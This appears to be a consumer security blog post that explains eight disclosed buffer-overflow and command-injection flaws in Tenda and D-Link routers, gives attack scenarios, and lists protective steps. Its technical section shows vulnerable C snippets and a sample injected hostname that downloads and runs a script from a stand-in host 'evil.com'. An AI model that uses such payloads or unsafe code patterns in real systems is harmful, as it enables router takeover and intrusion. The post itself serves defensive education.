8 Critical Router Vulnerabilities Hit Tenda & D-Link: What You Need to Know

Published: February 8, 2026

TL;DR: Eight critical vulnerabilities affecting Tenda and D-Link routers were disclosed this week, allowing attackers to potentially take full control of your home network. If you own a Tenda AC21, TX9, TX3, or D-Link DIR-823X router, you need to take action now.

What Just Happened?

On February 7-8, 2026, security researchers publicly disclosed eight critical vulnerabilities affecting some of the most popular consumer-grade routers from two major manufacturers: Tenda and D-Link. These aren't minor bugs—we're talking about flaws that could let an attacker hijack your router and control everything connected to your home network.

The vulnerabilities span two dangerous categories:

• Buffer overflow vulnerabilities (affecting Tenda routers)
• Command injection vulnerabilities (affecting D-Link routers)

Both types can lead to something security professionals call "Remote Code Execution" (RCE)—essentially, an attacker can run whatever commands they want on your router as if they were sitting at your keyboard.

Let's break down what this means for you, which devices are affected, and exactly what you should do about it.

How to Find and Remove End-of-Life Edge Devices Before Attackers Exploit Them

A Practical Guide to Complying with CISA BOD 26-02 (and Why Private Sector Should Too) The Wake-Up Call You Can’t Ignore On February 5, 2026, CISA dropped a bombshell: Binding Operational Directive 26-02 mandates that all federal agencies identify and remove end-of-life (EOL) edge devices from their networks within 18

Hacker Noob TipsHacker Noob Tips

The Affected Routers: Is Yours on the List?

Tenda Routers (Buffer Overflow Vulnerabilities)

D-Link Routers (Command Injection Vulnerabilities)

Additionally, related vulnerabilities CVE-2026-2155 and CVE-2026-2157 affect the same D-Link DIR-823X model in the DMZ configuration and static route table functions.

Not sure which router you have? Check the sticker on the bottom or back of your device—it should list the model number and firmware version.

Understanding the Vulnerabilities (No Degree Required)

Let's demystify the technical jargon. You don't need a computer science degree to understand what's happening here.

What is a Buffer Overflow?

Imagine you have a small glass that can hold 8 ounces of water. Now imagine someone tries to pour 16 ounces into it. What happens? The water overflows everywhere.

A buffer overflow works similarly in computers. A "buffer" is a small area of memory set aside to hold a specific amount of data—like a username or a configuration setting. When a program doesn't properly check how much data it's receiving, an attacker can send more data than the buffer can hold.

Here's where it gets dangerous: that extra data doesn't just disappear. It "overflows" into adjacent areas of memory. Skilled attackers can craft their overflow data to overwrite important parts of the program's memory—including the instructions the program follows. This lets them redirect the program to execute their malicious code instead.

In the context of these Tenda routers: When you change settings like your WiFi password or MAC address filter, you're filling out forms in the router's web interface. The vulnerable functions don't properly check how much data you're submitting. An attacker who can access your router's admin page (either from inside your network or, in some cases, from the internet) can send specially crafted oversized data that crashes the router or, worse, gives them complete control.

Real-world impact: An attacker could:

• Install persistent malware on your router
• Redirect your internet traffic through their servers
• Spy on everything you do online
• Use your router as part of a botnet to attack others

What is Command Injection?

Command injection is like convincing someone to pass along a secret message without knowing what it says.

Your router runs on a small operating system (usually a version of Linux). When you configure settings through the web interface, the router translates your clicks and form entries into commands it runs internally.

Here's the problem: If the router doesn't properly sanitize (clean up) the data you submit, an attacker can slip extra commands into form fields. It's like filling out a form that asks for your name, but instead of writing "John Smith," you write:

John Smith; delete_all_files; steal_passwords

If the system isn't checking for these tricks, it might just run all those extra commands.

In the context of the D-Link DIR-823X: When you configure features like Dynamic DNS (which lets you access your home network using a domain name), QoS settings (which prioritize certain traffic), or DMZ settings (which expose a device directly to the internet), the router takes your input and uses it in system commands.

The vulnerable code doesn't properly sanitize this input. An attacker can inject operating system commands that execute with full administrative privileges.

What attackers can do:

• Download and install malware
• Create backdoor accounts
• Steal your WiFi credentials
• Redirect DNS queries to malicious servers
• Turn your router into a zombie for DDoS attacks

How Serious Is This? (Spoiler: Very)

All eight vulnerabilities have been rated as HIGH severity, with CVSS scores ranging from 7.2 to 8.6 out of 10. To put that in perspective:

• 0.1-3.9 = Low
• 4.0-6.9 = Medium
• 7.0-8.9 = High
• 9.0-10.0 = Critical

Why These Vulnerabilities Are Particularly Dangerous

1. Exploits Are Already Public

This isn't a theoretical threat. Security researchers have already published proof-of-concept exploit code on GitHub. This means the barrier to entry for attackers is extremely low—anyone with basic technical skills can find and use these exploits.

2. Authentication May Not Stop Attackers

While most of these vulnerabilities require the attacker to be authenticated (logged in) to the router, don't let that give you false comfort:

• Default credentials are everywhere. Many users never change the default admin password on their routers. Attackers have lists of default passwords for every router model.
• Credential stuffing attacks. If you reuse passwords (be honest—most people do), attackers might already have your credentials from previous data breaches.
• Local network access. Anyone on your WiFi network—including that "helpful" neighbor you gave your password to—could potentially exploit these.

3. Consumer Routers Rarely Get Updated

Here's an uncomfortable truth: most home users never update their router firmware. In fact, studies suggest that over 80% of consumer routers are running outdated firmware with known vulnerabilities.

Router manufacturers don't always make updates easy to install, and they don't persist like your phone nagging you about the latest iOS update. Out of sight, out of mind—until it's too late.

4. Routers Are High-Value Targets

Your router is the gateway to your entire digital life. Compromising a router gives attackers:

• A persistent foothold that survives rebooting your computer
• The ability to intercept all unencrypted traffic
• Access to every device on your network (smart TVs, baby monitors, IoT devices)
• The ability to redirect you to phishing sites without you knowing
• A node in a botnet to attack others (making you legally liable in some jurisdictions)

Real-World Attack Scenarios

Let's paint a picture of what these attacks might look like in practice.

Scenario 1: The Mirai Remix

The Mirai botnet made headlines in 2016 when it used compromised routers and IoT devices to launch massive DDoS attacks that took down major websites like Twitter, Netflix, and Reddit.

Vulnerabilities like these are exactly what Mirai-style botnets feed on. Attackers scan the internet for vulnerable routers, automatically exploit them, and enlist them in botnets—often within hours of a vulnerability being disclosed.

If you have a vulnerable Tenda or D-Link router exposed to the internet (through remote management or UPnP), it could become part of a botnet without you ever knowing.

Scenario 2: The Coffee Shop Attack

Imagine you're at a coffee shop that uses a vulnerable D-Link DIR-823X router. An attacker on the same WiFi network exploits one of the command injection flaws. Now they can:

• Redirect all DNS queries through their malicious server
• Serve fake login pages for your bank, email, or social media
• Steal every credential you enter
• Inject malware into downloads

You'd never know until it's too late.

Scenario 3: The Targeted Intrusion

For more sophisticated attackers (or those targeting specific individuals), a compromised router is the perfect starting point:

1. Compromise the router using one of these vulnerabilities
2. Install persistent backdoor that survives firmware updates
3. Monitor all traffic to identify valuable targets (work emails, credentials)
4. Pivot to attack other devices on the network
5. Exfiltrate data slowly to avoid detection

Journalists, activists, and business professionals in sensitive positions should be especially concerned.

What You Should Do Right Now

Here's your action plan, broken down by urgency level.

Immediate Actions (Do Today)

Step 1: Check if You're Affected

Find your router and locate the model number:

• Check the sticker on the bottom/back of the device
• Log into your router's admin panel (usually 192.168.0.1 or 192.168.1.1)
• Look for model and firmware information in the dashboard

If you see any of these models, you're affected:

• Tenda AC21
• Tenda TX9
• Tenda TX3
• D-Link DIR-823X

Step 2: Change Your Admin Password NOW

If you've never changed it, your router is probably using default credentials like:

• admin/admin
• admin/password
• admin/(blank)
• user/user

Log into your router and change the admin password to something strong:

• At least 16 characters
• Mix of uppercase, lowercase, numbers, and symbols
• Don't reuse a password from anywhere else

Step 3: Disable Remote Management

Most attacks from the internet require remote management to be enabled. Disable it:

1. Log into your router's admin panel
2. Look for settings like:
   • "Remote Management"
   • "WAN Management"
   • "Remote Access"
   • "Access from WAN"
3. Disable/turn off this feature
4. Save settings

Step 4: Check for Firmware Updates

Visit the manufacturer's support page:

• Tenda: https://www.tendacn.com/en/download/list-1.html
• D-Link: https://support.dlink.com/

Search for your model and download any available firmware updates. Follow the manufacturer's instructions to install them.

Note: As of February 8, 2026, patches for these specific vulnerabilities may not yet be available. Continue checking daily.

Short-Term Actions (This Week)

Step 5: Audit Your Network Devices

Make a list of everything connected to your network:

• Computers and phones
• Smart TVs and streaming devices
• IoT devices (thermostats, cameras, doorbells)
• Gaming consoles

Any of these could be compromised if an attacker gains control of your router.

Step 6: Enable Your Router's Firewall

Most routers have a built-in firewall, but it's not always enabled by default:

1. Log into your router admin panel
2. Find "Firewall" or "Security" settings
3. Enable the firewall if it's off
4. Enable SPI (Stateful Packet Inspection) if available
5. Block anonymous ping requests from WAN

Step 7: Disable UPnP

Universal Plug and Play (UPnP) makes it easy for devices to open ports automatically, but it's also a major security risk:

1. Find UPnP in your router settings
2. Disable it
3. If something stops working, manually configure port forwarding for just that device

Step 8: Disable WPS

WiFi Protected Setup (WPS) is convenient but has known security flaws:

1. Find WPS settings in your router
2. Disable both PIN mode and push-button mode

Long-Term Actions

Step 9: Consider Replacing Your Router

If you're running a vulnerable model and patches aren't available, it might be time to upgrade. Consider routers from manufacturers with better security track records:

• For budget-conscious users: TP-Link Archer series, ASUS RT series
• For advanced users: pfSense, OPNsense on dedicated hardware
• For security-focused users: Firewalla, Ubiquiti EdgeRouter

When shopping, look for:

• Regular firmware updates
• Automatic update options
• Long support lifecycle
• Good security reputation

Step 10: Implement Network Segmentation

If you're technically inclined, consider creating separate network segments:

• Main network for trusted computers
• Guest network for visitors
• IoT network for smart devices

This limits damage if any device is compromised.

Step 11: Monitor for Unusual Activity

Keep an eye out for signs your router might be compromised:

• Unexplained slow internet
• Devices you don't recognize on your network
• Being redirected to strange websites
• Browser security warnings when visiting familiar sites
• Router settings that keep changing

Why This Keeps Happening

This isn't the first time we've seen widespread router vulnerabilities, and it won't be the last. But why?

The Economics of Consumer Electronics

Consumer routers are built to hit price points. A $30 router doesn't have budget for:

• Thorough security audits
• Long-term firmware support
• Rapid response to vulnerabilities

Manufacturers often use cheap components with known-vulnerable software, copy code between models without security review, and abandon products within 2-3 years of release.

The "Set It and Forget It" Problem

Routers don't have app stores that notify you of updates. Most users configure their router once and never think about it again—for years. Meanwhile, new vulnerabilities are constantly being discovered.

Coordinated Disclosure Challenges

These eight CVEs were all disclosed within 24 hours, suggesting a coordinated research effort. While this helps the security community understand the scope of the problem, it also arms attackers with multiple exploitation options simultaneously.

The Bigger Picture

These vulnerabilities fit a troubling pattern. Tenda and D-Link have appeared in security advisories repeatedly over the years:

• 2020: D-Link DIR series command injection flaws
• 2021: Tenda AC router stack buffer overflows
• 2023: Multiple Tenda authentication bypasses
• 2025: Additional D-Link and Tenda RCE vulnerabilities

Some of these companies' products are on "do not buy" lists from security professionals.

Technical Deep Dive (For the Curious)

If you want to understand more about how these vulnerabilities work technically, here's a deeper look.

Inside a Buffer Overflow

The Tenda TX9 vulnerabilities (CVE-2026-2138, CVE-2026-2139, CVE-2026-2140) all follow a similar pattern. Let's look at the static route configuration vulnerability as an example.

When you configure a static route, you submit data like:

• Destination IP
• Network mask
• Gateway address
• Interface name

The vulnerable function SetStaticRouteCfg allocates a fixed-size buffer to hold this data. In C code, it might look something like:

char routeList[512];  // Fixed size buffer
strcpy(routeList, userInput);  // Dangerous! No size check

The strcpy function copies data until it hits a null terminator, with no regard for buffer size. An attacker sends a "route list" that's 1000+ characters long, overwriting the return address stored on the stack.

When the function tries to return, it jumps to an address the attacker controls—typically pointing to shellcode they included in the overflow data.

Inside a Command Injection

The D-Link DIR-823X vulnerabilities show classic command injection patterns. When you configure DDNS, the router needs to run a command to update your dynamic DNS record. The vulnerable code might do something like:

char command[256];
sprintf(command, "ddns_update --host %s --ip %s", hostname, ip_address);
system(command);

If an attacker submits a hostname like:

myhost.com; wget http://evil.com/backdoor.sh | sh ;

The resulting command becomes:

ddns_update --host myhost.com; wget http://evil.com/backdoor.sh | sh ; --ip 192.168.1.1

The semicolons terminate the original command and start new ones. The attacker's malicious commands execute with root privileges.

Frequently Asked Questions

Q: My router isn't on the list. Am I safe?

These specific vulnerabilities only affect the listed models. However, your router may have other unpatched vulnerabilities. Good security practices (strong passwords, updated firmware, disabled remote management) apply to everyone.

Q: Can I tell if my router has been compromised?

It's difficult. Signs include unexpected behavior, unknown devices on your network, or settings that change without your input. For thorough checking, you'd need to analyze router logs and network traffic. When in doubt, factory reset and reconfigure from scratch.

Q: I don't have the technical skills for all this. What's the simplest thing I can do?

1. Change your admin password to something strong
2. Disable remote management
3. Consider replacing the router if it's on the vulnerable list

Q: Will a VPN protect me?

A VPN encrypts your traffic, which helps prevent eavesdropping. However, it won't stop an attacker who controls your router from redirecting your traffic, accessing other devices on your network, or using your router in a botnet.

Q: My ISP provided my router. What do I do?

Contact your ISP and ask:

1. Is the provided router affected by these vulnerabilities?
2. Will they push a firmware update?
3. Can you use your own router instead?

Conclusion

Eight critical vulnerabilities in widely-deployed home routers is a serious situation—but not an unprecedented one. The security of consumer networking equipment has been problematic for years, and this week's disclosures are a reminder that the device connecting your home to the internet deserves more attention.

The good news: you can take concrete steps right now to protect yourself. Change passwords, disable unnecessary features, update firmware, and if all else fails, replace vulnerable equipment.

The security community will continue monitoring for exploitation of these vulnerabilities. Patches will (hopefully) be released. In the meantime, stay vigilant, keep your firmware updated, and remember that your router is the first line of defense for your entire digital life.

Resources

• CVE Details:
  • CVE-2026-2157
  • CVE-2026-2155
• Firmware Downloads:
  • Tenda Support
  • D-Link Support
• Router Security Best Practices: CISA Home Router Security
• Check for Known Vulnerabilities: VulDB Router Search

Stay safe out there.